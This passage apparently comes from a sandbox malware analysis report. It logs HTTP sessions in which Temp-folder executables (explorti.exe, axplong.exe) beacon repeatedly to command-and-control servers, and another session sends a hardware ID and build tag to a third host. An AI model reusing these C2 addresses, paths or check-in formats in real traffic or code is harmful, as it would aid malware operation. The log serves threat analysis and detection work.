53	192.168.2.5	64094	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:33.970789909 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:34.739439011 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:34.740092039 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:34.988349915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	64098	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:34.984302044 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:35.759872913 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:35.760615110 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:36.009831905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	64099	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:35.123486042 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:35.891290903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:35.894896030 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:36.159524918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	64101	34.107.221.82	80	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:35.656712055 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 26, 2024 20:10:36.117475986 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 25 Jul 2024 18:28:59 GMT Age: 85297 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 26, 2024 20:10:46.127825975 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 26, 2024 20:10:48.262042046 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 26, 2024 20:10:48.361212969 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 25 Jul 2024 18:28:59 GMT Age: 85309 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	64103	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:36.126368046 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:36.906872988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:36.910006046 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:37.342377901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	64105	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:36.281740904 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:37.341950893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:37.342684984 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:37.342952013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:37.596306086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	64106	34.107.221.82	80	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:36.385952950 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 26, 2024 20:10:36.834894896 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 25 Jul 2024 18:23:15 GMT Age: 85641 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 26, 2024 20:10:46.852905989 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 26, 2024 20:10:48.842730045 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 26, 2024 20:10:48.939778090 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 25 Jul 2024 18:23:15 GMT Age: 85653 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	64109	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:37.450150967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:38.227691889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:38.278923988 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:38.525787115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	64114	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:37.731545925 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:38.482002974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:38.482840061 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:38.730413914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	64116	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:38.639692068 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:39.404647112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:39.405385017 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:39.675044060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	64117	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:38.866247892 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:39.646353960 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:39.647550106 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:39.950093985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	64119	85.28.47.31	80

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:39.303133965 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 20:10:40.079183102 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:10:40.082377911 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDA Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"sila------GHJJDGHCBGDHIECBGIDA--
Jul 26, 2024 20:10:40.334578037 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	64121	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:39.787095070 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:40.653481960 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
